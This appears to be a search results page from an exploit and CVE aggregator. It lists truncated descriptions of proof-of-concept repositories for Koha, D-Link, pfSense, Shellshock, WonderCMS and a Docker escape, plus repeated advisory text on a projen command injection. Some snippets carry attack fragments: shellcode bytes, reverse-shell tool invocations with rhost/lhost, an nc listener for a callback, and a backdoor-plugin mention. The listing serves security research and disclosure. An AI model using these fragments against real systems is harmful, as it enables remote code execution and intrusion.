34979 matches found
CVE-2024-36057
CVE-2024-36057 — Koha Library Software ID CVE: CVE-2024-36057 Producto: Koha Library Software Tipo de Vulnerabilidad: Inyección de Comandos del Sistema Operativo CWE-78 Puntuación CVSS: 8.7 Alta Autenticado Versiones Afectadas: Inferiores a 22.05.22 Créditos: Karolis Narvilas Descripción Koha es ...
Project-CVE-2026-50751
Pruebas de Seguridad CVE-2026-50751 IKEv1 Descripción Este script de Python es un framework de pruebas de seguridad ofensiva diseñado para apuntar a CVE-2026-50751, una vulnerabilidad de omisión de autenticación en VPN IKEv1 de Check Point. Características Escanea direcciones IP en busca de...
CVE-2026-23744-PoC
CVE-2026-23744-PoC 免责声明: 本概念验证(PoC)仅供 授权的安全研究、教育目的和受控实验室环境(例如 HTB、CTF 或经明确书面同意的内部渗透测试)使用。未经许可对任何系统进行未授权使用是非法且不道德的。作者对滥用不承担任何责任;用户应全权负责遵守所有适用法律法规。 描述 CVE-2026-23744 是 MCPJam Inspector(版本 ≤ 1.4.2)中的一个未认证命令注入漏洞。 /api/mcp/connect 端点接受包含 serverConfig.command 和 serverConfig.args 的 JSON...
WonderCMS-CVE-2020-35314
CVE-2020-35314 - WonderCMS 3.1.3 中的认证远程代码执行 此仓库创建的目的是测试 WonderCMS v3.1.3 上的远程代码执行漏洞。 此虚假插件包含一个后门 PHP shell,位于 evil.php 文件中。 建议不要在生产 Web 服务器上使用此虚假插件。...
SLAE
SecurityTube Linux 汇编专家 这篇博客文章是为完成 SecurityTube Linux 汇编专家认证的要求而创建的: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ 学生 ID:SLAE-1134 文章 作业 1:Linux x86 IPv4、IPv6 与双网络协议栈 TCP 绑定 Shell 作业 2:Linux x86 IPv4 和 IPv6 TCP 反向 Shell 作业 3:Linux x86 Egghunter(蛋搜索器) 作业 4:Lin...
exploits
漏洞利用 由 Xiphos Research 为测试目的编写的各类概念验证漏洞利用代码。 当前漏洞利用(索引可能已过时) phpMoAdmin 远程代码执行 CVE-2015-2208 LotusCMS 远程代码执行 OSVDB-75095 ElasticSearch 远程代码执行 CVE-2015-1427 ShellShock httpd 远程代码执行 CVE-2014-6271 IISlap - http.sys 拒绝服务/RCE PoC(仅 DoS)。MS-15-034 se0wned - Seowintech 路由器 diagnostic.cgi 远程 root WPsh0pw...
dlink_shell_poc
dlinkshellpoc Dlink shell PoC(概念验证) 已在 D-Link 815 Version A 1.3 上测试通过 适用于: DIR-110 DIR-412 DIR-600 DIR-610 DIR-615 DIR-645 https://vuldb.com/?id.7843 DIR-815 注意:PoC 代码不处理验证码。 示例 root@kitploit: root@kali: ./dlinkshellpoc.py -h usage: dlinkshellpoc.py -h -p PASSWORD -u URL -x D-Link Service.cgi RCE...
CVE-2026-41567
CVE-2026-41567 1day Docker 逃逸漏洞 CVE-2026-41567 的 1day。 这是一个使用特洛伊木马化的 xz / unpigz 进行 Docker 逃逸的演示。 它可以很容易地修改为远程使用(例如,只需将 Docker 默认 IP 修改为远程 C2 即可)。 有关该漏洞利用的更多信息,请参见此处 PoC 在主机上运行 netcat 监听端口 50005 root@kitploit: ubuntu@ubuntu-noble:/CVE-2026-41567$ nc -vlp 50005 Listening on 0.0.0.0 50005 Connectio...
-CVE-2014-6271-Shellshock-Remote-Command-Injection-
CVE-2014-6271 Shellshock远程命令注入 CVE-2014-6271 Apache Shellshock远程命令注入工具,用于快速反弹Shell和文件浏览 root@kitploit: Shellshock Apache远程利用 用法: ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234 ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la" ./Shellshock.py...
SLAE
SLAE Securitytube Linux 汇编专家(SLAE) SLAE-721 构建 root@kitploit: + Assembling ... + Linking ... + Extract Shellcode from binary ... "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x89" "\xc1\xb0\x0b\xcd\x80" + Create C-Header file ... + Compile PoC ... + Run PoC ... + Shellcode...
cve-2011-2523-vsftpd-validation-lab
CVE-2011-2523 — vsFTPd 2.3.4 Backdoor Validation Lab ⚠️ Authorized Lab Only — conducted in an isolated VirtualBox Host-Only network using Kali Linux and Metasploitable2. No unauthorized systems were scanned or accessed at any point. Overview CVE-2011-2523 is one of the most well-known supply chain...
CVE-2022-31814
Download CVE-2022-31814 该脚本利用 pfSense 中的一个漏洞来上传一个 shell、执行命令,然后删除 shell。 要求 Python 3.x requests 库 安装 1. 克隆仓库或下载脚本。 2. 安装所需的 Python 库: root@kitploit: pip install requests 使用 root@kitploit: python pfsense.py -f -c -f, --file:包含 URL 列表的文件路径(每行一个)。 -c, --command:要在目标上执行的命令。 示例 root@kitploit: python...
CVE-2026-89066
Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project...
CVE-2026-89066 OS command injection in the task synthesis component in projen
Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project...
CVE-2026-89066 OS command injection in the task synthesis component in projen
Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project...
CVE-2026-89066 OS command injection in the task synthesis component in projen
Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project...
CVE-2026-89066
CVE-2026-89066 is an OS command injection vulnerability in the task synthesis component of projen (versions before 0.103.0 ). Shell metacharacters present in project configuration values and repository file names are interpolated unsanitized into generated task definitions, allowing arbitrary com...
EUVD-2026-76151
Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project...